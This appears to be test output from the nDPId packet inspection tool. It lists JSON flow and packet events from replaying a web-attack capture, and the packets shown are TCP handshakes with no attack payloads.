-00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7418,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":524,"flow_packet_id":3,"flow_last_seen":1499347859192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347859192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0PBtAAD4Gib2sEAABwKgKMoKkAFB0dnKS8KJw44AQAOW\/vAAAAQEICgE8TosD5h\/\/"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347860489,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347860489,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33458,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7425,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":1,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"ABm5CmnxAMGxFOsxCABFAAA842JAAD4G4m2sEAABwKgKMoKyAFDBtqytAAAAAKACchAckgAAAgQFtAQCCAoBPE\/PAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7426,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":2,"flow_last_seen":1499347860489,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347860489,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgrJy9x5\/wbasrqAScSBm0QAAAgQFtAQCCAoD5iFDATxPzwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7427,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":525,"flow_packet_id":3,"flow_last_seen":1499347860490,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347860490,"pkt":"ABm5CmnxAMGxFOsxCABFAAA042NAAD4G4nSsEAABwKgKMoKyAFDBtqyucvcegIAQAOUF2QAAAQEICgE8T88D5iFD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347861783,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347861783,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33472,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7437,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":1,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lM1AAD4GMQOsEAABwKgKMoLAAFBG1cXfAAAAAKACchB88AAAAgQFtAQCCAoBPFESAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7438,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":2,"flow_last_seen":1499347861783,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347861783,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgsCSqnQ8RtXF4KAScSBQewAAAgQFtAQCCAoD5iKHATxREgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7440,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":526,"flow_packet_id":3,"flow_last_seen":1499347861784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347861784,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lM5AAD4GMQqsEAABwKgKMoLAAFBG1cXgkqp0PYAQAOXvgQAAAQEICgE8URMD5iKH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347863072,"flow_last_seen":1499347863072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347863072,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7449,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":1,"flow_last_seen":1499347863072,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863072,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8NydAAD4GjqmsEAABwKgKMoLOAFBzZGVyAAAAAKACchCvfQAAAgQFtAQCCAoBPFJVAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7450,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":2,"flow_last_seen":1499347863073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347863073,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgs7A+ay+c2Rlc6AScSAa9QAAAgQFtAQCCAoD5iPJATxSVQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7451,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":527,"flow_packet_id":3,"flow_last_seen":1499347863073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347863073,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0NyhAAD4GjrCsEAABwKgKMoLOAFBzZGVzwPmsv4AQAOW5\/AAAAQEICgE8UlUD5iPJ"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347864367,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864367,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7458,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":1,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8SwNAAD4Ges2sEAABwKgKMoLcAFBKORibAAAAAKACchAkLwAAAgQFtAQCCAoBPFOYAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7459,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":2,"flow_last_seen":1499347864367,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347864367,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgtztJOKwSjkYnKAScSAsRQAAAgQFtAQCCAoD5iUNATxTmAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7461,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":528,"flow_packet_id":3,"flow_last_seen":1499347864368,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347864368,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0SwRAAD4GetSsEAABwKgKMoLcAFBKORic7STisYAQAOXLSwAAAQEICgE8U5kD5iUN"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347735664,"flow_last_seen":1499347740821,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60384,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347738229,"flow_last_seen":1499347743822,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60410,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347739497,"flow_last_seen":1499347744823,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60424,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7467,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347864861,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347867086,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347867086,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33526,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7482,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":1,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sxZAAD4GErqsEAABwKgKMoL2AFBvHeVWAAAAAKACchAvzQAAAgQFtAQCCAoBPFZAAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7483,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":2,"flow_last_seen":1499347867086,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347867086,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgvZcEWBbbx3lV6AScSBIpAAAAgQFtAQCCAoD5ie1ATxWQAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":529,"flow_packet_id":3,"flow_last_seen":1499347867087,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347867087,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sxdAAD4GEsGsEAABwKgKMoL2AFBvHeVXXBFgXIAQAOXnqwAAAQEICgE8VkAD5ie1"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347868358,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347868358,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7491,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":1,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8189AAD4G7gCsEAABwKgKMoMEAFA06oCxAAAAAKACchDNWQAAAgQFtAQCCAoBPFd+AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7492,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":2,"flow_last_seen":1499347868358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347868358,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgwSCLK7WNOqAsqAScSBwXAAAAgQFtAQCCAoD5ijzATxXfgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7493,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":530,"flow_packet_id":3,"flow_last_seen":1499347868359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347868359,"pkt":"ABm5CmnxAMGxFOsxCABFAAA019BAAD4G7gesEAABwKgKMoMEAFA06oCygiyu14AQAOUPZAAAAQEICgE8V34D5ijz"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347869628,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347869628,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33554,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7503,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":1,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8XbNAAD4GaB2sEAABwKgKMoMSAFAbjgUPAAAAAKACchBhDAAAAgQFtAQCCAoBPFi8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7504,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":2,"flow_last_seen":1499347869628,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347869628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgxKd9DBxG44FEKAScSBlbwAAAgQFtAQCCAoD5iowATxYvAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":531,"flow_packet_id":3,"flow_last_seen":1499347869629,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347869629,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0XbRAAD4GaCSsEAABwKgKMoMSAFAbjgUQnfQwcoAQAOUEdwAAAQEICgE8WLwD5iow"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347872187,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347872187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33580,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7521,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":1,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ycVAAD4G\/AqsEAABwKgKMoMsAFDCtZL+AAAAAKACchApXAAAAgQFtAQCCAoBPFs7AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7522,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":2,"flow_last_seen":1499347872187,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347872187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgyztIpfbwrWS\/6AScSB0pgAAAgQFtAQCCAoD5iywATxbOwEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7523,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":532,"flow_packet_id":3,"flow_last_seen":1499347872188,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347872188,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ycZAAD4G\/BGsEAABwKgKMoMsAFDCtZL\/7SKX3IAQAOUTrQAAAQEICgE8WzwD5iyw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347873465,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347873465,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33594,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7533,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":533,"flow_packet_id":1,"flow_last_seen":1499347873465,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347873465,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+eFAAD4Gy+6sEAABwKgKMoM6AFCd+qWaAAAAAKACchA6LQAAAgQFtAQCCAoBPFx7AAAAAAEDAwc="} 